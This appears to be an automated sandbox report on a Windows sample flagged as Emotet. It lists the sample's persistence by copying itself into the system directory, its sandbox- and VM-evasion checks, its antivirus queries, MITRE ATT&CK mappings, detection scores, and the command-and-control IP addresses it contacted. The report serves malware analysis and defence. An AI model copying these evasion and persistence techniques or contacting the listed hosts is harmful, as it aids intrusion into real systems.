                    Source: 9fdUNaHzLv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: 9fdUNaHzLv.exeVirustotal: Detection: 84%
                    Source: 9fdUNaHzLv.exeReversingLabs: Detection: 96%
                    Source: unknownProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe 'C:\Users\user\Desktop\9fdUNaHzLv.exe'
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe C:\Users\user\Desktop\9fdUNaHzLv.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exe
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeProcess created: C:\Users\user\Desktop\9fdUNaHzLv.exe C:\Users\user\Desktop\9fdUNaHzLv.exeJump to behavior
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess created: C:\Windows\SysWOW64\providernvidia.exe C:\Windows\SysWOW64\providernvidia.exeJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: 9fdUNaHzLv.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,0_2_00D11F40

                    Persistence and Installation Behavior:

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Windows\SysWOW64\providernvidia.exeExecutable created and started: C:\Windows\SysWOW64\providernvidia.exeJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exePE file moved: C:\Windows\SysWOW64\providernvidia.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile opened: C:\Windows\SysWOW64\providernvidia.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)Show sources
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-2109
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeAPI coverage: 6.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 5628Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: svchost.exe, 0000000A.00000002.466244484.000002A4BBE61000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                    Source: providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmp, svchost.exe, 0000000A.00000002.466184270.000002A4BBE4C000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.463400537.000001D2FDC3C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: svchost.exe, 0000000D.00000002.463317483.000001D2FDC02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                    Source: svchost.exe, 0000000A.00000002.463565249.000002A4B662A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`C
                    Source: svchost.exe, 0000000D.00000002.463400537.000001D2FDC3C000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.464006095.000001E2FBC69000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.463746343.00000142C402A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000007.00000002.221819030.0000011003F40000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.283724026.0000026CEF060000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.465548228.000001E2FC790000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.308122256.000001C80BF40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                    Source: C:\Windows\SysWOW64\providernvidia.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,0_2_00D11F40
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D11BE0 mov eax, dword ptr fs:[00000030h]0_2_00D11BE0
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D19EE0 EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,RtlFreeHeap,ExitProcess,0_2_00D19EE0
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: svchost.exe, 0000000F.00000002.463712753.000001C9F3790000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\providernvidia.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9fdUNaHzLv.exeCode function: 0_2_00D18D50 RtlGetVersion,GetNativeSystemInfo,0_2_00D18D50
                    Source: C:\Windows\SysWOW64\providernvidia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                    Source: svchost.exe, 00000013.00000002.463757283.0000025982840000.00000004.00000001.sdmpBinary or memory string: &@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000013.00000002.463821817.0000025982902000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 9fdUNaHzLv.exe, type: SAMPLE
                    Source: Yara matchFile source: 00000006.00000000.203362622.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.204527300.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.463908181.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.203725030.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.202520329.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.194691427.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000000.195820099.0000000000D11000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.providernvidia.exe.d10000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.0.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.providernvidia.exe.d10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.9fdUNaHzLv.exe.d10000.0.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection2Masquerading121Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API11Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery51Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    9fdUNaHzLv.exe84%VirustotalBrowse
                    9fdUNaHzLv.exe97%ReversingLabsWin32.Trojan.Emotet
                    9fdUNaHzLv.exe100%AviraTR/Crypt.XPACK.Gen
                    9fdUNaHzLv.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.0.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    5.0.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.2.providernvidia.exe.d10000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    5.2.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.0.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    2.2.9fdUNaHzLv.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    6.0.providernvidia.exe.d10000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://173.230.145.224:8080/6%VirustotalBrowse
                    http://173.230.145.224:8080/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/Z0%Avira URL Cloudsafe
                    http://173.230.145.224:8080/_0%Avira URL Cloudsafe
                    https://79.172.249.82:443/3%VirustotalBrowse
                    https://79.172.249.82:443/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/0%Avira URL Cloudsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    http://79.172.249.82:443/10%Avira URL Cloudsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    https://dynamic.t0%URL Reputationsafe
                    http://79.172.249.82:443/0%Avira URL Cloudsafe
                    http://193.169.54.12:8080/30%Avira URL Cloudsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://79.172.249.82:443/false
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                      high
                      http://173.230.145.224:8080/providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmptrue
                      • 6%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://193.169.54.12:8080/Zprovidernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                          high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                            high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                    high
                                    http://173.230.145.224:8080/_providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                                      high
                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                        high
                                        http://193.169.54.12:8080/providernvidia.exe, 00000006.00000003.279590439.000000000079C000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000011.00000003.308773313.000001E921640000.00000004.00000001.sdmpfalse
                                          high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                            high
                                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpfalse
                                              high
                                              https://%s.xboxlive.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                high
                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://79.172.249.82:443/1providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000A.00000002.465483390.000002A4BBD00000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000011.00000002.309109992.000001E921642000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.tsvchost.exe, 00000011.00000003.308724185.000001E921662000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000011.00000002.309091104.000001E921639000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000011.00000003.308742105.000001E92164B000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://79.172.249.82:443/providernvidia.exe, 00000006.00000002.463740202.000000000079C000.00000004.00000020.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://activity.windows.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.bingmapsportal.comsvchost.exe, 00000011.00000002.309051305.000001E921613000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000011.00000003.308735974.000001E921660000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000011.00000003.287007711.000001E921630000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.309100617.000001E92163D000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://193.169.54.12:8080/3providernvidia.exe, 00000006.00000002.463769550.00000000007A7000.00000004.00000020.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 0000000E.00000002.463912336.000001E2FBC3E000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    low
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000011.00000003.308755545.000001E921649000.00000004.00000001.sdmpfalse
                                                                                      high

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      193.169.54.12
                                                                                      unknownGermany
                                                                                      49464ICFSYSTEMSDEfalse
                                                                                      173.230.145.224
                                                                                      unknownUnited States
                                                                                      63949LINODE-APLinodeLLCUSfalse
                                                                                      79.172.249.82
                                                                                      unknownHungary
                                                                                      43711SZERVERNET-HU-ASHUfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                      Analysis ID:380921
                                                                                      Start date:03.04.2021
                                                                                      Start time:01:03:34
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 0s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Sample file name:9fdUNaHzLv (renamed file extension from none to exe)
                                                                                      Cookbook file name:default.jbs
